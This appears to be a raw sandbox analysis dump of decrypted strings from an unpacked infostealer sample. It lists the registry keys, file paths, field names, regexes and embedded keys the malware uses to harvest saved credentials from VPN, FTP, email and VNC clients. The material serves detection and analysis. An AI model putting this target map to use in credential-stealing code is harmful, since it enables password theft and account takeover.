                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Dyn\Updater\config.dyndns
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: username=
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: password=
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: https://account.dyn.com/
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: t6KzXhCh
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ALLUSERSPROFILE
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Dyn\Updater\daemon.cfg
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: global
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: accounts
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: account.
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: username
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: account.
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Psi/Psi+
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: name
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Psi/Psi+
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: APPDATA
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Psi\profiles
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: APPDATA
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Psi+\profiles
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \accounts.xml
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \accounts.xml
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: OpenVPN
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Software\OpenVPN-GUI\configs
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Software\OpenVPN-GUI\configs
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Software\OpenVPN-GUI\configs\
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: username
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: auth-data
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: entropy
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: USERPROFILE
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \OpenVPN\config\
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: remote
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: remote
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: NordVPN
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: NordVPN
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: NordVpn.exe*
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: user.config
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: //setting[@name='Username']/value
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: //setting[@name='Password']/value
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: NordVPN
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Private Internet Access
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: %ProgramW6432%
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Private Internet Access\data
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ProgramFiles(x86)
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Private Internet Access\data
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \account.json
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: .*"username":"(.*?)"
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: .*"password":"(.*?)"
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Private Internet Access
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: privateinternetaccess.com
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: FileZilla
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: APPDATA
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \FileZilla\recentservers.xml
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: APPDATA
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \FileZilla\recentservers.xml
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <Server>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <Host>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <Host>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: </Host>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <Port>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: </Port>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <User>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <User>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: </User>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <Pass encoding="base64">
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <Pass encoding="base64">
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: </Pass>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <Pass>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <Pass encoding="base64">
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: </Pass>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: CoreFTP
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SOFTWARE\FTPWare\COREFTP\Sites
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: User
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Host
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Port
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: hdfzpysvpzimorhk
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: WinSCP
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: HostName
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: UserName
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: PublicKeyFile
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: PortNumber
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: [PRIVATE KEY LOCATION: "{0}"]
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: WinSCP
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ABCDEF
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Flash FXP
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: port
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: user
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: pass
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: quick.dat
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Sites.dat
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \FlashFXP\
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \FlashFXP\
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: FTP Navigator
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SystemDrive
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \FTP Navigator\Ftplist.txt
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Server
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: No Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: User
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SmartFTP
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: APPDATA
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: WS_FTP
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: appdata
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: HOST
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: PWD=
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: PWD=
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: FtpCommander
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SystemDrive
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SystemDrive
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SystemDrive
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \cftp\Ftplist.txt
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ;Password=
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ;User=
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ;Server=
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ;Port=
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ;Port=
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ;Password=
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ;User=
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ;Anonymous=
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: FTPGetter
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \FTPGetter\servers.xml
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <server>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <server_ip>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <server_ip>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: </server_ip>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <server_port>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: </server_port>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <server_user_name>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <server_user_name>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: </server_user_name>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <server_user_password>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <server_user_password>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: </server_user_password>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: FTPGetter
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: The Bat!
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: appdata
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \The Bat!
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Account.CFN
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Account.CFN
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Becky!
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: DataDir
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Folder.lst
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Mailbox.ini
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Account
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: PassWd
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Account
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SMTPServer
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Account
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: MailAddress
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Becky!
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Outlook
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Email
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: IMAP Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: POP3 Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: HTTP Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SMTP Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Email
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Email
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Email
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: IMAP Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: POP3 Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: HTTP Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SMTP Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Server
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Windows Mail App
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Software\Microsoft\ActiveSync\Partners
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Email
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Server
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SchemaId
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: pResourceElement
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: pIdentityElement
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: pPackageSid
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: pAuthenticatorElement
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: syncpassword
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: mailoutgoing
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: FoxMail
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Executable
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: FoxmailPath
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Storage\
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Storage\
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \mail
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \mail
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Accounts\Account.rec0
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Accounts\Account.rec0
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Account.stg
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Account.stg
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: POP3Host
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SMTPHost
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: IncomingServer
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Account
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: MailAddress
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: POP3Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Opera Mail
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: opera:
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: PocoMail
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: appdata
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Pocomail\accounts.ini
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Email
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: POPPass
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SMTPPass
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SMTP
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: eM Client
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: eM Client\accounts.dat
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: eM Client
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Accounts
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: "Username":"
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: "Secret":"
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: "ProviderName":"
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: o6806642kbM7c5
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Mailbird
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SenderIdentities
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Accounts
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Mailbird\Store\Store.db
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Server_Host
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Accounts
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Email
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Username
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: EncryptedPassword
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Mailbird
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: RealVNC 4.x
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: RealVNC 3.x
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SOFTWARE\RealVNC\vncserver
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: RealVNC 4.x
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SOFTWARE\RealVNC\WinVNC4
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: RealVNC 3.x
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Software\ORL\WinVNC3
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: TightVNC
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Software\TightVNC\Server
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: TightVNC
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Software\TightVNC\Server
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: PasswordViewOnly
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: TightVNC ControlPassword
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Software\TightVNC\Server
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ControlPassword
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: TigerVNC
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Software\TigerVNC\Server
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: UltraVNC
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ProgramFiles(x86)
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: passwd
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: UltraVNC
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ProgramFiles(x86)
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: passwd2
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: UltraVNC
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ProgramFiles
